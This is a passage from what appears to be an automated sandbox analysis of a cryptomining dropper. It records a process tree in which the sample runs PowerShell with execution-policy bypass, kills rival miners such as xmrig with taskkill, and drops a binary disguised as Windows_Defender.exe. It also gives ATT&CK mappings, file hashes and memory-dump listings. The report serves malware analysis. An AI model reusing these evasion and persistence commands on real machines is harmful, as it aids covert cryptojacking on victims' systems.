2⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\system32\taskkill.exe
taskkill /im xmrig.exe /f"
3⤵
- Kills process with taskkill
PID:736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im zzmsahbg.exe /f"
2⤵
PID:1188

C:\Windows\system32\taskkill.exe
taskkill /im zzmsahbg.exe /f"
3⤵
- Kills process with taskkill
PID:2568

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im xmr-stak.exe /f"
2⤵
PID:1644

C:\Windows\system32\taskkill.exe
taskkill /im xmr-stak.exe /f"
3⤵
- Kills process with taskkill
PID:404

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im asmhfn.exe /f"
2⤵
PID:2628

C:\Windows\system32\taskkill.exe
taskkill /im asmhfn.exe /f"
3⤵
- Kills process with taskkill
PID:2012

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im pamguam.exe /f"
2⤵
PID:4432

C:\Windows\system32\taskkill.exe
taskkill /im pamguam.exe /f"
3⤵
- Kills process with taskkill
PID:1964

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im xmrig.exe /f"
2⤵
PID:4012

C:\Windows\system32\taskkill.exe
taskkill /im xmrig.exe /f"
3⤵
- Kills process with taskkill
PID:2388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
PowerShell.exe C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs"
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -exec bypass -command "C:\Users\Administrator\AppData\Local\Temp\Windows\UntitledOnPriv.ps1"
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3524

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14lxs5yy.4dl.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
88db94ed708224b98985e80c0c361ace

SHA1
58b9badd68cc571725fa0d34ebb2dd210167910e

SHA256
45eecdd95367835d8823ae8aac28f3a2a7b1b2a1f5c8501637a76bf5fe4d413d

SHA512
f7aa11faaf75d54a6e77bf2b0ebe8db1b6a247917c3d0cc4a616dd93fec8392ed93900e4e50be80ec05f9188b5e2f819e78537bae03aa1fe00778e4da232bf7d

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2624b15fb15001d9a59ba771f3b8b9b8

SHA1
40d466ffe8ecf9941024a1ef3c9260e6c82910ed

SHA256
0217e1913a09eec1f81cc2d462a00d5fbc8283b186c6d6c94d6f085540d3d9af

SHA512
8662fc03d20be28f82faf11702ae2a0bb62ae910b7cd276f8f28bc8813957b8fad2f9c06284b4f867714b9fb215dedef89879e60e2bbb85ad19f2d45a35222a9

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8974419dc85c44356fdd6532bd6f6d64

SHA1
c186be5888759ca2a9dc8c99382ddd798bbda0c1

SHA256
3be38347a56e4039c99eac1f6fe35a6d0484d7c11cc7074bc29ac188c5263e66

SHA512
549c71771a506d28b3dd4b2d57393959dffa9ce58950347335f48b5edce0ac9d4b03df13d3e4c11a4e04af48de0e1f1f51a8dc7baa07f747447040ab2d52f12e

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
190cc2feb6fbf6a6143f296ebe043de5

SHA1
8fa72a99c46ed77b602476c85ca2d8ea251b22fb

SHA256
4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

SHA512
94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e039a9c856e8f1a36872dc5b550f7b75

SHA1
d7b8ff279e0df3b2e822828004649778a7c95024

SHA256
71e5712d75558d4ce64f4eb37df72d0e2fe88c87aceba90aa10c672dcc3943cb

SHA512
19484391612f621c307aa736537be552d9d3672c6ba8ed7d550989831b574499ac7857d0339e9f83a5fbf97c34c21b27966decc367950193e58cce2eaff013a1

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e0cfecee32d6c3b3077518534d3b760a

SHA1
706e3db1a55accaf7dfa9c4e87bde81cb3753d8d

SHA256
bbf44fe2b1447b1a669ec71d8a1c7458e62e6eae2be7ce4c2647e2cc77e6d92b

SHA512
e4e22a8290542adfb8fcd32e489197ea07feb8657d631a3023ba67908318c63133d7c7cb68b3c4f5f0e4b820859e376ed7074fbdb95e10ef1646f0537c75ad61

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
77d1d4eea371373475c9741ccf519756

SHA1
098408ff8108285165879165dde0e6350ea5cfdf

SHA256
5b6a87ed34a378ba7b0d4d269c89c88b19d82ae61c36c34f6fd86d838dca4e65

SHA512
f1fbb1960ff00bc9f933651dbf449d4852a02e719d1882d25e9fe4352f1a8fbf504a6ec6471d1de8b4579dcb815f8798b49d2f023704e0a78cfde355dfc20c6e

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
38626e78f952256a721176512a7f8c26

SHA1
70636067d2b0ec031d6912faba82a8665fa54a08

SHA256
ce79b9265cd36fec49cda6c92664354a8b6448bcf28bc13ff8b318b3b80c756d

SHA512
49005e71061285d59144a8551bb9b317694a64b383c64ec6e3c34308371a95b8fbac7356c2a8eb15477030f9aee10b347bca4f95601ba4b262eb3df0ec22c0d2

Download Submit
C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2238871af228384f4b8cdc65117ba9f1

SHA1
2a200725f1f32e5a12546aa7fd7a8c5906757bd1

SHA256
daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

SHA512
1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

Download Submit
C:\Users\Administrator\AppData\Local\Temp\Windows\UntitledOnPriv.ps1
Filesize
1KB

MD5
8c0ecf1cadaca4fb96b6584e07e7647b

SHA1
69720f44315317f5668173b9ae15778e24828a6a

SHA256
a460c86a6e9957592467f0b48506991345b323cadf7fec245324f145b2cc360b

SHA512
c19539ae46e41810ec55d58fb394a44467f94950539f5bdf8e8f0f03113dbd61414762084b056dbdecc8a5a465112d5f2ea705abe93ff67bdb656349aca633b1

Download Submit
C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs
Filesize
191B

MD5
83937ff15cafd9ac49a2f9b32f7438d2

SHA1
04fa7a3ee77949a02b378b793f430ac5e74cb4b6

SHA256
791cec11251c859688336e3a1f89027d3316df219c4203b85d383da56b0a8472

SHA512
2434197130a4abc0a4b846d96ee0f4601e322984d5a8fc66c6fee6e9b26d105f0bf51bfb560c398791db98272f92b7b761e133f7b04ba5c49d8b5ac8ee94cc4c

Download Submit
C:\Users\Administrator\Appdata\Local\Temp\Windows\Windows_Defender.exe
Filesize
5.2MB

MD5
1f1f27deffe539d99e12d720f1fbd7da

SHA1
a021497f416dded6636e88d8955a3a7632fbfcf2

SHA256
7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

SHA512
2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522

Download Submit
C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
Filesize
3.1MB

MD5
94484839cf6f9765088e03271330ef26

SHA1
a9417b34c5d13354bd61b950142f47d7b92db6c1

SHA256
a7b71f6801c97c20677b4f5f54f77e69eb05108dc38ab67ac81a19338dfb3a65

SHA512
c434246af68785db332019ef0aac9e90678d9ca94c1ca9bf2a65a08803854843eae5e1da1b53565af831f3f20f54d24b0c7592c34535ad0888ee2c2e44149ac0

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
memory/1284-243-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/1284-244-0x00000252C6E30000-0x00000252C6E40000-memory.dmp

Filesize
64KB

Download
memory/1884-145-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/1884-151-0x0000020CB1360000-0x0000020CB1370000-memory.dmp

Filesize
64KB

Download
memory/1884-157-0x0000020CB1360000-0x0000020CB1370000-memory.dmp

Filesize
64KB

Download
memory/1884-160-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/2944-172-0x0000021D3F3F0000-0x0000021D3F400000-memory.dmp

Filesize
64KB

Download
memory/2944-177-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/2944-162-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3004-238-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3004-241-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3012-120-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3012-84-0x000002217F5F0000-0x000002217F60C000-memory.dmp

Filesize
112KB

Download
memory/3012-110-0x000002217F840000-0x000002217F85C000-memory.dmp

Filesize
112KB

Download
memory/3012-112-0x000002217F880000-0x000002217F89A000-memory.dmp

Filesize
104KB

Download
memory/3012-114-0x000002217F830000-0x000002217F838000-memory.dmp

Filesize
32KB

Download
memory/3012-115-0x000002217F860000-0x000002217F866000-memory.dmp

Filesize
24KB

Download
memory/3012-116-0x000002217F870000-0x000002217F87A000-memory.dmp

Filesize
40KB

Download
memory/3012-117-0x000002217D170000-0x000002217D180000-memory.dmp

Filesize
64KB

Download
memory/3012-39-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3012-40-0x000002217D170000-0x000002217D180000-memory.dmp

Filesize
64KB

Download
memory/3012-74-0x000002217D170000-0x000002217D180000-memory.dmp

Filesize
64KB

Download
memory/3012-111-0x000002217F820000-0x000002217F82A000-memory.dmp

Filesize
40KB

Download
memory/3012-85-0x00007FF4EDC00000-0x00007FF4EDC10000-memory.dmp

Filesize
64KB

Download
memory/3012-95-0x000002217D170000-0x000002217D180000-memory.dmp

Filesize
64KB

Download
memory/3524-208-0x0000017CF1500000-0x0000017CF1510000-memory.dmp

Filesize
64KB

Download
memory/3524-207-0x0000017CF1500000-0x0000017CF1510000-memory.dmp

Filesize
64KB

Download
memory/3524-206-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3524-224-0x0000017CF1500000-0x0000017CF1510000-memory.dmp

Filesize
64KB

Download
memory/3524-226-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3684-193-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3684-199-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3684-194-0x0000019065960000-0x0000019065970000-memory.dmp

Filesize
64KB

Download
memory/3896-125-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3896-118-0x00000297CC550000-0x00000297CC560000-memory.dmp

Filesize
64KB

Download
memory/3896-42-0x00000297CC550000-0x00000297CC560000-memory.dmp

Filesize
64KB

Download
memory/3896-41-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/3896-60-0x00000297CC550000-0x00000297CC560000-memory.dmp

Filesize
64KB

Download
memory/3896-97-0x00007FF48DC50000-0x00007FF48DC60000-memory.dmp

Filesize
64KB

Download
memory/3896-96-0x00000297E7000000-0x00000297E70B5000-memory.dmp

Filesize
724KB

Download
memory/3896-98-0x00000297E6DB0000-0x00000297E6DBA000-memory.dmp

Filesize
40KB

Download
memory/3896-113-0x00000297CC550000-0x00000297CC560000-memory.dmp

Filesize
64KB

Download
memory/4128-181-0x0000026199800000-0x0000026199804000-memory.dmp

Filesize
16KB

Download
memory/4128-183-0x00000261997E0000-0x00000261997E4000-memory.dmp

Filesize
16KB

Download
memory/4128-178-0x00000261997C0000-0x00000261997D0000-memory.dmp

Filesize
64KB

Download
memory/4128-182-0x0000026199810000-0x0000026199814000-memory.dmp

Filesize
16KB

Download
memory/4128-179-0x00000261997D0000-0x00000261997D4000-memory.dmp

Filesize
16KB

Download
memory/4128-180-0x00000261997E0000-0x00000261997E4000-memory.dmp

Filesize
16KB

Download
memory/4396-6-0x00007FFBD9ED0000-0x00007FFBDA991000-memory.dmp

Filesize
10.8MB

Download
memory/4396-11-0x000001EC55790000-0x000001EC557A0000-memory.dmp

Filesize
64KB

Download
memory/4396-0-0x000001EC57880000-0x000001EC578A2000-memory.dmp

Filesize
136KB

Download
memory/4396-12-0x000001EC55790000-0x000001EC557A0000-memory.dmp

Filesize
64KB

Download
memory/4396-15-0x00007FFBD9ED0000-0x00007FFBDA991000-memory.dmp

Filesize
10.8MB

Download
memory/4812-36-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/4812-27-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/4812-32-0x0000028F3DC00000-0x0000028F3DC10000-memory.dmp

Filesize
64KB

Download
memory/4812-33-0x0000028F3DC00000-0x0000028F3DC10000-memory.dmp

Filesize
64KB

Download
memory/4924-108-0x00007FF43CD00000-0x00007FF43CD10000-memory.dmp

Filesize
64KB

Download
memory/4924-126-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/4924-72-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/4924-73-0x00000297DB0F0000-0x00000297DB100000-memory.dmp

Filesize
64KB

Download
memory/4924-109-0x00000297DB0F0000-0x00000297DB100000-memory.dmp

Filesize
64KB

Download
memory/5076-139-0x00000227741E0000-0x00000227741F0000-memory.dmp

Filesize
64KB

Download
memory/5076-133-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download
memory/5076-142-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

Filesize
10.8MB

Download